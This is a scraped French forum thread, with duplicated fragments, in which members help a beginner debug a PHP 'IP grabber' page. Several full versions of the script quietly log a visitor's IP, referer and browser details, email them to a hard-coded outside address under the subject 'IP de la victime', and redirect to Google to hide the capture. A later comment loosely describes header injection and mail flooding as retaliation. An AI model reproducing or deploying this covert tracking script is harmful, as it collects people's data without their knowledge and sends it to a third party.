cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 2007
-
13 mars 2005 à 11:52
MacGaliver
Messages postés146Date d'inscriptionvendredi 28 mai 2010StatutMembreDernière intervention21 juillet 2013
-
28 mai 2012 à 13:42
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.
MacGaliver
Messages postés146Date d'inscriptionvendredi 28 mai 2010StatutMembreDernière intervention21 juillet 20133 28 mai 2012 à 13:42
J'envoi plein de requête en peu de temps.
J'injecte des données faussées dans l'en-tête.
J'utilise un PA / VPN / ou j'injecte un petit script.
Et voilà votre boite mail craque.
OU j'injecte des scripts dangereux dans l'en-tête...
et là cette votre ordi qui craque.
Évitez de piéger, car le piège peux se refermer sur vous-même.
Résultat ==> Script dangereux pour le "pirate" (pirate entre guillemets).
cs_chico200987
Messages postés92Date d'inscriptionsamedi 13 novembre 2004StatutMembreDernière intervention26 septembre 2008 14 mars 2005 à 19:10
c'est fait merci pour cette remarque ;)
stepibou
Messages postés112Date d'inscriptionjeudi 11 mars 2004StatutMembreDernière intervention11 octobre 2006 14 mars 2005 à 11:48
salut chico,
tu marque que c'est pour debutant, donc
au lieu de marquer : "ben voilà quoi :)"
dans explication finale, marque plutot qui faut php5!
bon voila , sinon c'est bien.
a+
cs_chico200987
Messages postés92Date d'inscriptionsamedi 13 novembre 2004StatutMembreDernière intervention26 septembre 2008 13 mars 2005 à 12:35
a oui merc c'était "<!-- script pour l'ip -->" qui genais merci ;o) jlavais oublié lui =)
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 13 mars 2005 à 12:33
Je t'ai dit d'enlever le code html....
Et ensuite <?PHP est à remplacer par <?php
Bref enlève ça : <!-- script pour l'ip -->
cs_chico200987
Messages postés92Date d'inscriptionsamedi 13 novembre 2004StatutMembreDernière intervention26 septembre 2008 13 mars 2005 à 12:22
<!-- script pour l'ip -->
<?PHP
ob_start();
define("IDX_GRANULARITY", 10000000);
function getClientIP() {
$ip = 0;
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$ip = $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipList = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ipList, $ip);
$ip = 0;
}
foreach ($ipList as $v)
if (!eregi("^(192\.168|172\.16|10|224|240|127|0)\.", $v))
return $v;
}
return $ip ? $ip : $_SERVER['REMOTE_ADDR'];
}
function searchIndex($ip, $idxFileName = "ip-to-country.idx") {
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen("ip.txt","w"); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,"0.0.0.0"); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//<!-- Envoie ip par mail ! -->
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen('ip.txt','w'); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,'0.0.0.0'); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//ENVOIE L'IP PAR MAIL
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
Bref je précise que tu dois dégager tout le html, ta page php reste comme ça, fini le code crade au début et à la fin :-)
a +
cs_chico200987
Messages postés92Date d'inscriptionsamedi 13 novembre 2004StatutMembreDernière intervention26 septembre 2008 13 mars 2005 à 11:58
voilà l'erreur que j'obtient :
Warning: Cannot modify header information - headers already sent by (output started at /var/www/free.fr/a/5/chicodu89/ip.php:2) in /var/www/free.fr/a/5/chicodu89/ip.php on line 69
pourtant il n'y a pas de header au debut
cs_Anthomicro
Messages postés9433Date d'inscriptionmardi 9 octobre 2001StatutMembreDernière intervention13 avril 20078 13 mars 2005 à 11:52
Salut,
mieux vaut faire un header pour rediriger, ça t'évite de mettre du code html :
<?php
define('IDX_GRANULARITY', 10000000);
function getClientIP() {
$ip = 0;
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$ip = $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipList = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ipList, $ip);
$ip = 0;
}
foreach ($ipList as $v)
if (!eregi("^(192\.168|172\.16|10|224|240|127|0)\.", $v))
return $v;
}
return $ip ? $ip : $_SERVER['REMOTE_ADDR'];
}
function searchIndex($ip, $idxFileName = 'ip-to-country.idx') {
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen('ip.txt','w'); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,'0.0.0.0'); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//ENVOIE L'IP PAR MAIL
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
28 mai 2012 à 13:42
J'injecte des données faussées dans l'en-tête.
J'utilise un PA / VPN / ou j'injecte un petit script.
Et voilà votre boite mail craque.
OU j'injecte des scripts dangereux dans l'en-tête...
et là cette votre ordi qui craque.
Évitez de piéger, car le piège peux se refermer sur vous-même.
Résultat ==> Script dangereux pour le "pirate" (pirate entre guillemets).
14 mars 2005 à 19:10
14 mars 2005 à 11:48
tu marque que c'est pour debutant, donc
au lieu de marquer : "ben voilà quoi :)"
dans explication finale, marque plutot qui faut php5!
bon voila , sinon c'est bien.
a+
13 mars 2005 à 12:35
13 mars 2005 à 12:33
Et ensuite <?PHP est à remplacer par <?php
Bref enlève ça : <!-- script pour l'ip -->
13 mars 2005 à 12:22
<?PHP
ob_start();
define("IDX_GRANULARITY", 10000000);
function getClientIP() {
$ip = 0;
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$ip = $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipList = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ipList, $ip);
$ip = 0;
}
foreach ($ipList as $v)
if (!eregi("^(192\.168|172\.16|10|224|240|127|0)\.", $v))
return $v;
}
return $ip ? $ip : $_SERVER['REMOTE_ADDR'];
}
function searchIndex($ip, $idxFileName = "ip-to-country.idx") {
$hFile = @fopen($idxFileName, "r");
if (!$hFile) return False;
$ip = (int)($ip / IDX_GRANULARITY);
$iRecord = 0;
$iIndex = 0;
while ($aData = fgetcsv($hFile, 100)) {
if ($ip >= $iIndex && $ip < $aData[0])
return array($aData[1], $iRecord);
$iIndex = $aData[0];
$iRecord = $aData[1];
}
fclose($hFile);
return array(-1, $iRecord);
}
$NewIp = getClientIP() ;
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen("ip.txt","w"); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,"0.0.0.0"); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//<!-- Envoie ip par mail ! -->
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
$mailheaders = "From: Ip de la victime<> \n";
mail($recipient, $subject, $msg, $mailheaders);
header('location:http://www.google.fr');
ob_end_flush();
?>
13 mars 2005 à 12:20
13 mars 2005 à 12:16
13 mars 2005 à 12:12
ob_start();
et tout en bas : ob_end_flush();
ça donne ça :
<?php
ob_start();
define('IDX_GRANULARITY', 10000000);
function getClientIP() {
$ip = 0;
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$ip = $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipList = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ipList, $ip);
$ip = 0;
}
foreach ($ipList as $v)
if (!eregi("^(192\.168|172\.16|10|224|240|127|0)\.", $v))
return $v;
}
return $ip ? $ip : $_SERVER['REMOTE_ADDR'];
}
function searchIndex($ip, $idxFileName = 'ip-to-country.idx') {
$hFile = @fopen($idxFileName, "r");
if (!$hFile) return FALSE;
$ip = (int)($ip / IDX_GRANULARITY);
$iRecord = 0;
$iIndex = 0;
while ($aData = fgetcsv($hFile, 100)) {
if ($ip >= $iIndex && $ip < $aData[0])
return array($aData[1], $iRecord);
$iIndex = $aData[0];
$iRecord = $aData[1];
}
fclose($hFile);
return array(-1, $iRecord);
}
$NewIp = getClientIP() ;
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen('ip.txt','w'); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,'0.0.0.0'); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//ENVOIE L'IP PAR MAIL
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
$mailheaders = "From: Ip de la victime<> \n";
mail($recipient, $subject, $msg, $mailheaders);
header('location:http://www.google.fr');
ob_end_flush();
?>
Bref je précise que tu dois dégager tout le html, ta page php reste comme ça, fini le code crade au début et à la fin :-)
a +
13 mars 2005 à 11:58
Warning: Cannot modify header information - headers already sent by (output started at /var/www/free.fr/a/5/chicodu89/ip.php:2) in /var/www/free.fr/a/5/chicodu89/ip.php on line 69
pourtant il n'y a pas de header au debut
13 mars 2005 à 11:52
mieux vaut faire un header pour rediriger, ça t'évite de mettre du code html :
<?php
define('IDX_GRANULARITY', 10000000);
function getClientIP() {
$ip = 0;
if (!empty($_SERVER['HTTP_CLIENT_IP']))
$ip = $_SERVER['HTTP_CLIENT_IP'];
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ipList = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
if ($ip) {
array_unshift($ipList, $ip);
$ip = 0;
}
foreach ($ipList as $v)
if (!eregi("^(192\.168|172\.16|10|224|240|127|0)\.", $v))
return $v;
}
return $ip ? $ip : $_SERVER['REMOTE_ADDR'];
}
function searchIndex($ip, $idxFileName = 'ip-to-country.idx') {
$hFile = @fopen($idxFileName, "r");
if (!$hFile) return FALSE;
$ip = (int)($ip / IDX_GRANULARITY);
$iRecord = 0;
$iIndex = 0;
while ($aData = fgetcsv($hFile, 100)) {
if ($ip >= $iIndex && $ip < $aData[0])
return array($aData[1], $iRecord);
$iIndex = $aData[0];
$iRecord = $aData[1];
}
fclose($hFile);
return array(-1, $iRecord);
}
$NewIp = getClientIP() ;
// Ecrire l'ip dans le fichier ip.txt
$fp = fopen('ip.txt','w'); // On ouvre le fichier en écriture
fseek($fp,0); // On se place en début de fichier
if (strlen($NewIp) > 6)
{
fputs($fp,$NewIp); // 5.On écrit dans le fichier le nouveau IP
}
else
{
fputs($fp,'0.0.0.0'); // On écrit dans le fichier "0.0.0.0"
}
fclose($fp); // On ferme le fichier
//print $NewIp ;
//ENVOIE L'IP PAR MAIL
$msg = "IP:\t$NewIp\n \tVenant du site : $HTTP_REFERER\n Naviguateur :\t$HTTP_USER_AGENT\n Langue : \t$HTTP_ACCEPT_LANGAGE\n Logiciels utilisés : \t$HTTP_ACCEPT\n Type de compression : \t$HTTP_ACCEPT_ENCODING\n";
$recipient = "mohamedloucif89@aol.com";
$subject = "IP de la victime";
$mailheaders = "From: Ip de la victime<> \n";
mail($recipient, $subject, $msg, $mailheaders);
header('location:http://www.google.fr');
?>